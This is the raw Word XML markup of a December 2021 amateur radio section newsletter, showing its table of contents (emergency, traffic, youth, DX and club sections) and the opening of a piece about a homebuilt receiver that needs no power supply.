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0F36BCE" w14:textId="77777777" w:rsidR="00560B6A" w:rsidRDefault="009475CA" w:rsidP="00D62A20">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="top"/>
      <w:r w:rsidRPr="006229FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62A478B5" wp14:editId="0B972252">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3048000" cy="1376680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21221"/>
                <wp:lineTo x="21465" y="21221"/>
                <wp:lineTo x="21465" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="32" name="Picture 32" descr="https://3.bp.blogspot.com/-EMLcXahq7o0/WHuWYD7kB6I/AAAAAAAACaY/Lw26BBqkZas5EdVdgBUXLuAWCibY01woACPcBGAYYCw/s400/OSJ%2BLogo.jpg">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3.bp.blogspot.com/-EMLcXahq7o0/WHuWYD7kB6I/AAAAAAAACaY/Lw26BBqkZas5EdVdgBUXLuAWCibY01woACPcBGAYYCw/s400/OSJ%2BLogo.jpg">
                      <a:hlinkClick r:id="rId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48000" cy="1376680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00375B97">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E5289" w14:textId="7B179B22" w:rsidR="00A75B46" w:rsidRDefault="00375B97" w:rsidP="00D62A20">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009560E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>December</w:t>
      </w:r>
      <w:r w:rsidR="00D761EF">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2021</w:t>
      </w:r>
      <w:r w:rsidR="007455E0">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38276048" w14:textId="2D5DF1CA" w:rsidR="002E0CE9" w:rsidRDefault="00FD0EAD" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk496530170"/>
      <w:bookmarkStart w:id="2" w:name="_Hlk511478609"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="007401BB">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69A373" w14:textId="46DBF9A3" w:rsidR="002E0CE9" w:rsidRDefault="002E0CE9" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7BAD81" w14:textId="72429EE3" w:rsidR="00164CA6" w:rsidRDefault="00164CA6" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Hlk17487262"/>
      <w:bookmarkStart w:id="4" w:name="_Hlk9706175"/>
      <w:bookmarkStart w:id="5" w:name="_Hlk11519925"/>
      <w:bookmarkStart w:id="6" w:name="_Hlk22806700"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="85" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5447"/>
        <w:gridCol w:w="5258"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD0EAD" w:rsidRPr="00FA5744" w14:paraId="23D8B825" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C3AB91B" w14:textId="35584111" w:rsidR="00FD0EAD" w:rsidRPr="006A4286" w:rsidRDefault="00FD0EAD" w:rsidP="002E0CE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A4286">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006A4286">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="tc" w:history="1">
              <w:r w:rsidRPr="006A4286">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>From the Technical Coordinator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="53DC1D58" w14:textId="1386182B" w:rsidR="00FD0EAD" w:rsidRPr="006A4286" w:rsidRDefault="00FD0EAD" w:rsidP="002E0CE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E5E9F52" w14:textId="747BC0BA" w:rsidR="00FD0EAD" w:rsidRDefault="00FD0EAD" w:rsidP="002E0CE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5744">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA5744">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink w:anchor="sec" w:history="1">
              <w:r w:rsidRPr="006B1AA6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>From the Section Emergency Coordinator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4F12EB46" w14:textId="690DB96F" w:rsidR="00FD0EAD" w:rsidRPr="00045792" w:rsidRDefault="00FD0EAD" w:rsidP="002E0CE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045792">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984CC8" w:rsidRPr="00FA5744" w14:paraId="1E6BE842" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14E7F152" w14:textId="03101FE5" w:rsidR="00984CC8" w:rsidRPr="006A4286" w:rsidRDefault="00984CC8" w:rsidP="00984CC8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5744">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="00FA5744">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink w:anchor="pic" w:history="1">
              <w:r w:rsidRPr="006B1AA6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>From the Public Information Coordinator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B62025" w14:textId="77777777" w:rsidR="00392B24" w:rsidRDefault="00392B24" w:rsidP="00392B24">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="7" w:name="_Hlk54286461"/>
            <w:bookmarkEnd w:id="7"/>
            <w:r w:rsidRPr="00AC558C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="stm" w:history="1">
              <w:r w:rsidRPr="006A4286">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>From the Section Traffic Manager</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="21218805" w14:textId="3309073B" w:rsidR="00984CC8" w:rsidRPr="00FA5744" w:rsidRDefault="00984CC8" w:rsidP="00984CC8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00984CC8" w:rsidRPr="00FA5744" w14:paraId="6D2F0ED6" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F4A8D8" w14:textId="19E1F661" w:rsidR="00984CC8" w:rsidRPr="006A4286" w:rsidRDefault="00392B24" w:rsidP="00392B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D0D92">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="008D0D92">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink w:anchor="training" w:history="1">
              <w:r w:rsidRPr="006A4286">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>ARES Training Update</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFE4F25" w14:textId="7066C640" w:rsidR="00984CC8" w:rsidRPr="00415C80" w:rsidRDefault="00392B24" w:rsidP="00EF1C1F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4056F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="syc" w:history="1">
              <w:r w:rsidR="00243289" w:rsidRPr="002E51FB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>From the Section Youth Coordinator</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D0D92" w:rsidRPr="00FA5744" w14:paraId="3C55866F" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D3573C6" w14:textId="1C1DE987" w:rsidR="0033329A" w:rsidRPr="002E51FB" w:rsidRDefault="009C4C2F" w:rsidP="0075676A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4056F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="national" w:history="1">
              <w:r w:rsidRPr="00BD4278">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>National News</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66A7542F" w14:textId="42949864" w:rsidR="008D0D92" w:rsidRPr="002E51FB" w:rsidRDefault="0075676A" w:rsidP="008D0D92">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4056F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="club" w:history="1">
              <w:r w:rsidRPr="00C42D53">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Club Corner</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
      <w:tr w:rsidR="008873F8" w:rsidRPr="00FA5744" w14:paraId="50EF536E" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="612C22D2" w14:textId="1CC55FCC" w:rsidR="008873F8" w:rsidRPr="006A4286" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A1ED3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="South40" w:history="1">
              <w:r w:rsidRPr="00F46D4E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">From </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">The </w:t>
              </w:r>
              <w:r w:rsidRPr="00F46D4E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Sout</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>h 40</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BE53E87" w14:textId="77777777" w:rsidR="008873F8" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="dx" w:history="1">
              <w:r w:rsidRPr="00E64495">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>DX This Week</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7540C5C0" w14:textId="7B461021" w:rsidR="008873F8" w:rsidRPr="00906240" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008873F8" w:rsidRPr="00FA5744" w14:paraId="606218FC" w14:textId="77777777" w:rsidTr="008873F8">
        <w:trPr>
          <w:trHeight w:val="552"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5447" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C8FA2F7" w14:textId="77777777" w:rsidR="008873F8" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink w:anchor="one" w:history="1">
              <w:r w:rsidRPr="00C42D53">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>One Question Questionnaire</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="13CBA72F" w14:textId="6D6BC235" w:rsidR="008873F8" w:rsidRPr="006A4286" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                                                                               </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D97B76" w14:textId="439B5E73" w:rsidR="008873F8" w:rsidRPr="00FA5744" w:rsidRDefault="008873F8" w:rsidP="008873F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:hyperlink w:anchor="final" w:history="1">
              <w:r w:rsidRPr="006A4286">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Calibri"/>
                </w:rPr>
                <w:t>Final..  Final..</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DA983DC" w14:textId="142B5073" w:rsidR="00805EB1" w:rsidRDefault="00805EB1" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Hlk17103203"/>
      <w:bookmarkStart w:id="9" w:name="_Hlk526876777"/>
      <w:bookmarkStart w:id="10" w:name="_Hlk535656435"/>
      <w:bookmarkStart w:id="11" w:name="_Hlk70226350"/>
      <w:bookmarkStart w:id="12" w:name="_Hlk17193093"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="186E6396" w14:textId="06CD05F0" w:rsidR="00B60223" w:rsidRDefault="00B60223" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Hlk25432997"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6EBBA18C" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">After building cutting edge SDRs like the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>uSDX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and HL2 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>super efficient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> rigs like the QCX my latest build goes ever further. This receiver goes past software definition to hardware definition and is so efficient tha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE5AD5" w14:textId="09F3F2F0" w:rsidR="001D6216" w:rsidRDefault="00FA0475" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>it requires no power supply at all!</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0475">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F353A" w14:textId="77777777" w:rsidR="001D6216" w:rsidRDefault="001D6216" w:rsidP="00A87275">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252987392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D856AC9" wp14:editId="4124BDD2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>136525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4805045" cy="3602990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="59" name="Picture 59" descr="A picture containing text,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picture containing text, electronics&#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805045" cy="3602990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FA0475" w:rsidRPr="00FA0475">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FA0475" w:rsidRPr="00FA0475">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252986368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F13019D" wp14:editId="4C3725FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
